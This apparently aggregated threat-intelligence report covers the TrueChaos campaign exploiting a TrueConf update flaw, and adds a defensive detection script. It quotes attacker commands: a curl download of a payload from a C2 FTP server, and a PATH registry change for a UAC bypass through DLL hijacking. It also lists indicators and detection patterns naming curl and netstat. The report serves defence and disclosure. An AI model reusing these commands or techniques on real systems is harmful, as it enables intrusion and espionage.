INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
TrueConf Zero-Day Exploited in Southeast Asian Government Network Attacks
2026-03-31 16:03 | Severity: CRITICAL / HIGH
Executive Summary (AI-generated)
The TrueChaos campaign has been linked to a high-severity security flaw in the TrueConf client video conferencing software, CVE-2026-3502, which allows an attacker to distribute and execute arbitrary code. The vulnerability stems from insufficient validation in the client's update mechanism: Chinese-nexus threat actors who gain control over an on-premises server can substitute legitimate updates with poisoned versions, compromising every connected endpoint.
Technical Mitigations (AI-generated)
* Enforce integrity checking in the update mechanism so that the client verifies a server-provided update has not been tampered with before executing it, for example by validating a digital signature over the update package (transport encryption alone does not provide this guarantee).
* Regularly review and audit client configurations so that the trust relationship between servers and clients cannot be abused to exploit vulnerabilities like CVE-2026-3502.
* Use intrusion detection systems (IDS) and security information and event management (SIEM) tooling to monitor for suspicious activity around the TrueConf update mechanism, such as unusual network traffic or login attempts.
* Educate users on keeping software current with the latest patches and updates, including those that specifically address vulnerabilities like CVE-2026-3502.
* Consider a "zero-trust" approach that treats every endpoint as potentially compromised until proven otherwise and requires additional authentication and authorization before granting access to sensitive areas.
Technical Observables
Intelligence Metadata
Campaign: Operation TrueChaos
Malware: ShadowPad, Havoc
CVE: CVE-2026-3502
Target regions: APAC, EUROPE
Incident Timeline
March 2026
Threat actors exploited a zero-day vulnerability in the TrueConf Windows client to target government networks in Southeast Asia.
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, released in March 2026.
Mar 31, 2026
The threat actors exploited CVE-2026-3502 in the TrueConf client video conferencing software to target government entities in Southeast Asia.
Ravie Lakshmanan, Mar 31, 2026, Zero-Day / Vulnerability
A high-severity security flaw in the TrueConf client video conferencing software has been exploited in the wild as a zero-day as part of a campaign targeting government entities in Southeast Asia dubbed TrueChaos.
The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.
The DLL implant ("7z-x64.dll") has also been observed performing hands-on-keyboard actions to conduct reconnaissance, set up persistence, and retrieve additional payloads ("iscsiexe.dll") from an FTP server ("47.237.15[.]197").
It has been patched in the TrueConf Windows client starting with version 8.5.3, released earlier this month.
The vulnerability in question is CVE-2026-3502 (CVSS score: 7.8), a lack of integrity check when fetching application update code, allowing an attacker to distribute a tampered update, resulting in the execution of arbitrary code.
2026-03-31
Threat actors used the malicious 7z-x64.dll implant to exploit a zero-day vulnerability in TrueConf, a video conferencing platform that operates entirely within a private local network (LAN) without requiring an internet connection.
Figure 6 – Attacker Hands-on-Keyboard Activity
Initial reconnaissance included commands such as:
    tasklist > cache
    tracert 8.8.8.8 -h 5
The attackers then downloaded an additional loader, iscsiexe.dll, from the FTP server and extracted it to the %temp% directory:
    curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o
    c:\program files\winrar\winrar.exe x
Hunt for poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity.
Indicators of Compromise
trueconf_windows_update.exe – Malicious TrueConf client update – 22e32bcf113326e366ac480b077067cf
iscsiexe.dll – Loader – 9b435ad985b733b64a6d5f39080f4ae0
7z-x64.dll – Havoc implant – 248a4d7d4c48478dcbeade8f7dba80b3
43.134.90[.]60 – Havoc C2
43.134.52[.]221 – Havoc C2
47.237.15[.]197 – Havoc C2
Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, which was then loaded through DLL side-loading.
By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt.
"C:\users\<redacted>\appdata\local\temp" /f
c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe
iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll.
Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry.
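As an added example (not code from the page or from Check Point Research), the hunt guidance for poweriso.exe spawning cmd.exe and the Run\UpdateCheck persistence check above, expressed as detection logic over Sysmon-style process-creation events and HKCU Run values; every sample event and registry value below is constructed for illustration.

```python
import ntpath
import re

# Tools named in the hunt guidance; word boundaries avoid matching e.g. "curly".
TOOL_RE = re.compile(r"\b(curl|winrar\.exe|netstat)\b", re.IGNORECASE)
# Autorun value and target named in the persistence guidance on the page.
PERSISTENCE_VALUE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck"
PERSISTENCE_TARGET = r"C:\ProgramData\PowerISO\PowerISO.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# modelled on Figure 6; not real telemetry from a victim host.
SAMPLE_PROCESS_EVENTS = [
    {"parent_image": PERSISTENCE_TARGET, "image": CMD, "command_line":
     "cmd.exe /c curl -u ftpuser:REDACTED ftp://47.237.15[.]197/update.7z -o update.7z"},
    {"parent_image": PERSISTENCE_TARGET, "image": CMD, "command_line":
     r'cmd.exe /c "c:\program files\winrar\winrar.exe" x update.7z'},
    {"parent_image": PERSISTENCE_TARGET, "image": CMD, "command_line": "cmd.exe /c tasklist > cache"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": CMD,
     "command_line": "cmd.exe /c netstat -ano"},  # benign: an admin at a prompt
]
# Constructed HKCU Run values: one matching the TrueChaos persistence, one benign.
SAMPLE_RUN_VALUES = [
    {"value": PERSISTENCE_VALUE, "data": r'"C:\ProgramData\PowerISO\PowerISO.exe"'},
    {"value": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

def _name(path):
    """Lower-cased file name of a Windows path ('' when the field is absent)."""
    return ntpath.basename(path or "").lower()

def classify_process(event):
    """'high' when poweriso.exe -> cmd.exe runs a listed tool, 'medium' for any other
    poweriso.exe -> cmd.exe spawn (still worth a look), None for everything else."""
    if _name(event.get("parent_image")) != "poweriso.exe" or _name(event.get("image")) != "cmd.exe":
        return None
    return "high" if TOOL_RE.search(event.get("command_line", "")) else "medium"

def is_persistence_hit(run_value):
    """True when Run\\UpdateCheck resolves to the dropped PowerISO.exe (quotes ignored)."""
    data = run_value.get("data", "").strip().strip('"')
    return (run_value.get("value", "").lower() == PERSISTENCE_VALUE.lower()
            and data.lower() == PERSISTENCE_TARGET.lower())

def hunt(process_events, run_values):
    """Findings a hunter would triage, keyed by indicator type."""
    return {
        "process": [(classify_process(e), e["command_line"])
                    for e in process_events if classify_process(e)],
        "persistence": [v["value"] for v in run_values if is_persistence_hit(v)],
    }
```

Calling hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_RUN_VALUES) returns two "high" and one "medium" process findings plus the UpdateCheck persistence hit; the explorer.exe-parented netstat is left alone because the parent is not poweriso.exe.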
Key Points
Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as CVE-2026-3502, with a CVSS score of 7.8.
CVE-2026-3502 Root Cause Analysis
[Figure 1 – Geographic Distribution of Internet-Exposed TrueConf Servers]
When the TrueConf client starts, it checks the connected on-premises server for available updates.
The current version of the desktop apps is 8.5.2. The update process would successfully upgrade the client from version 8.5.1 to the then-current 8.5.2.
Attribution
Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor.
The assessment is based on a combination of factors: TTPs consistent with Chinese-nexus operations such as DLL side-loading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure, and victimology that aligns with Chinese-nexus strategic interests.
TrueConf is an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection.
The attacker then modified the current user’s PATH variable in order to perform a UAC bypass using the Microsoft iSCSI Initiator Control Panel tool:
    reg add "hkcu\environment" /v path /t
Beginning of 2026
Threat actors used a TrueConf zero-day exploit in targeted attacks against government entities in Southeast Asia.
Introduction
At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment.
Attacks exploiting the vulnerability were first recorded by the cybersecurity company at the beginning of 2026, with the implicit trust the client places in the update mechanism being weaponized to push a rogue installer that, in turn, leverages DLL side-loading to launch a DLL backdoor.
Intelligence Sources
Zero Day Fans – 2026-03-31
The Hacker News – 2026-03-31
Incident Version History
Last Updated: 2026-04-27T11:53
Tactical Telemetry
Campaign: Operation TrueChaos
Exploited CVE: CVE-2026-3502
Cyber Operation Type: Espionage
MITRE ATT&CK Technique: T1218.002 – Control Panel
Malware Payload: Havoc